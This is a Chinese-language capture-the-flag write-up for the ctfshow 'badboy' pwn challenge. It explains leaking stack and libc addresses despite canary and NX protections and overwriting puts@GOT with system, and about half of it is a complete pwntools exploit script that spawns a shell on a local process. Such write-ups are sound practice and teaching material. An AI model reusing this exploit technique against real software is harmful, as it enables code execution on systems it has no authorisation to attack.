ctfshow元旦水友赛-badboy
好久没打了,有人提到了,就看一看。
开了canary和nx保护,原本想着泄露canary,结果找不到泄露的方向。
kl点进去可以看到是6
可以循环两次,第一次泄露6个字节,第二次泄露3个字节。第一次泄露libc,第二次泄露栈。
地址分别相差0x18(24)和0x38(56),fd8-eb0=0x128(296)
libc.sym查询不到__libc_start_call_main这个名字,直接手动查找相减找了偏移为0x1110+0x26000
(至于为什么又加了一个,因为手动vmmap看libc载入地址的时候看错地方了,第一个才是载入地址,这里看成了第二个,所以多减了一次。)
6个字节足够泄露一个完整的地址,而三个字节不可以,由于需要将buf地址改为put_got的地址,所以一定要知道栈的地址,而3个字节已经足够libc的偏移地址。
另:如果用远程打可以试着泄露下面的__libc_start_main,本地打通了,懒得再去打远程了。~~ 而且题目给了libc文件,从里面去看也一样嘛~~
exp:
from pwn import*
context(log_level='debug',arch='amd64',os='linux')
p=process('./BadBoy-2')
elf=ELF('./BadBoy-2')
libc=elf.libc
#p=remote('',)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda :p.recvline()
def debug():
gdb.attach(p)
pause(1)
puts_got = 0x601018
#debug()
sl(b'56')
stack_addr = u64(ru('\x7f')[-6:].ljust(8,b'\x00'))-0x128
print(hex(stack_addr))
sl(b'24')
rl()
#print(rl())
libc_addr=u64(rc(3).ljust(8,b'\x00'))
print(hex(libc_addr))
libc_addr = libc_addr-122-0x1110-0x26000
print(hex(libc_addr))
system_addr = libc_addr+libc.sym['system']
print(hex(system_addr))
offset=puts_got-stack_addr
ru('girl')
sd('sh\x00')
ru('me?')
debug()
sl(str(offset))
sd(p32(system_addr))
p.interactive()
~